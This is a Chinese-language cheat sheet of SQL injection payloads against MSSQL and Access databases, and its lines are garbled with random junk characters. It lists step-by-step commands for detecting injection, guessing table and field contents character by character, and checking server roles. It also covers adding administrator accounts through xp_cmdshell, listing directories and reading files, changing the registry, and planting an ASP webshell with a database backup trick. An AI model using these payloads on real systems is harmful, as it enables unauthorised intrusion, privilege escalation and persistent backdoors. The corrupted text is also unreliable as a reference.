1.判断是否有注入;and 1=1 ;and 1=2 '4"9f]:
2.初步判断是否是mssql ;and user>0 '{[n,xeR
KE~l#=S
3.注入参数是字符'and [查询条件] and ''=' $+P6R`K
A=PJg!
4.搜索时没过滤参数的'and [查询条件] and '%25'=' yx@%x?B
MJzY|
5.判断数据库系统 x$:P;#
Q[wTV3d
;and (select count(*) from sysobjects)>0 mssql x A&RMu&
jDV;tEY#^
;and (select count(*) from msysobjects)>0 access c)b/"
tbH`VD"u
3w>S?"W#
kL7n`o
6.猜数据库 ;and (select Count(*) from [数据库名])>0 :j)v=qul
v7h!'U[/
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 `<"@&N^d
YUGEGXw
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 F=B[%4q`%
pGsk[.
9.(1)猜字段的ascii值(access) k6}M7&nY
Fad.!%[
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 mRNA ,*
js$L<^7
(2)猜字段的ascii值(mssql) _, ki/7{
w
YEkWB^
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 &c|3v!
$M0F~x
10.测试权限结构(mssql) UZV\]Y
pef)c,U$
;!C~_{/t
*3Vic
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
}x9D;%)/
^5GyW`a}
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- }MiEbLduN
7eR%zNDa
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 1^HmM"DD
u alpm#GU
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 4#D<#!]^
7~ I*u6zY
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- L,+m5wKj[
}Z,x F`
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 0p31C7!
Gkr]8J
;and 1=(select IS_MEMBER('db_owner'));-- moOc
G3=9
Bn<1zg5
2LTMt?
L%CBz]`
11.添加mssql和系统的帐户 YaT6vSz
%*A|hK+G:W
;exec master.dbo.sp_addlogin username;-- =-m"y~{>3
;exec master.dbo.sp_password null,username,password;-- &*JU
N}86
&Rp/y%9
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- )ZQ>h{}D
X1C
&;5
;exec master.dbo.xp_cmdshell 'net user username password ]_EJ "'x
mH,L,3R;R
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- JS^QfT,zE
l} =@9A@
;exec master.dbo.xp_cmdshell 'net user username password /add';-- v\3
\n3[u
LK}*k/eG
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- &*nq.l76X`
1zP)~p3a
8{f~tPY
_-R&A@
12.(1)遍历目录 y[64O x
KB$SB25m
;create table dirs(paths varchar(100), id int) 6]^~yby P
Pe,:FIp,
;insert dirs exec master.dbo.xp_dirtree 'c:\' 0|=,!sY
`:Bm@eN
;and (select top 1 paths from dirs)>0 7/969h^s
SmUj8?6"
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) !LX)
$[xS>iuD
r1A<XP|1?I
Pl\r|gS;
(2)遍历目录 5@-[[ $dk
>3qfo2K0
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- !K %8tr4
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 S11ME
b$JrLZs$_
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 6>Z)w}x^
N87)rhXSo,
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ;ipT0*Y
EZee
kxs
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 WZQ
EBXs
=H_vRd
(~
`?_
/Pyj|!C3`q
13.mssql中的存储过程 .dO8I/lhV
oO4hBM([
xp_regenumvalues 注册表根键, 子键 :?P>))vT%
[q!/YL3%
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Gpf9uj%
kc7,F2=F
xp_regread 根键,子键,键值名 Kk\TW1w3
n|N?[)^k
;exec xp_regread o FS2*u
oB$c-!&
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 L:_GpZ_
)jPIBzMys
xp_regwrite 根键,子键, 值名, 值类型, 值 Z'!i"Jzq|{
?_t_rF(?6
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 hCPyCq]
HPc~wX
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 yBl9 a-2A
)_a;xB`S(
xp_regdeletevalue 根键,子键,值名 k~XDwmt;
X8\UTHT&0
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 { u %xc"0y
%}}?Y`/W)
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 x+8%4]u`
5rH?FQE
^r@,(r6w
Pq(7lua7
14.mssql的backup创建webshell 3%(,f,
]R*h3U@5#K
use model X#<+D1P
+'0V6\y
create table cmd(str image); O)8$aAJ)V
vI20G89E
insert into cmd(str) values (''); v];P| Fi
V.-cm51I
backup database model to disk='c:\l.asp'; :Xs3Vh,V
=eyPo(B
mfx-Ja_a
JI[{n~bhGD
15.mssql内置函数 z)ndj
1,#)
@gnLY
;and (select @@version)>0 获得Windows的版本号 jR2^n`D
O~#A )d6
;and user_name()='dbo' 判断当前系统的连接用户是不是sa HV=P!v6
_ -|+k
;and (select user_name())>0 爆当前系统的连接用户 ~5>k_\G8
]NyN@9u@(
;and (select db_name())>0 得到当前连接的数据库 8gxo{<,9
:X}fXgeL
KP)t,\@f!
%z6_ ,|%
16.简洁的webshell _%wB*u,X
`O]$FpO
use model sLd%m+*p
vcC"
create table cmd(str image); ()W`4p
sV;q(,oru
insert into cmd(str) values (''); GmH`ipi
&fW'_,-
backup database model to disk='g:\wwwtest\l.asp';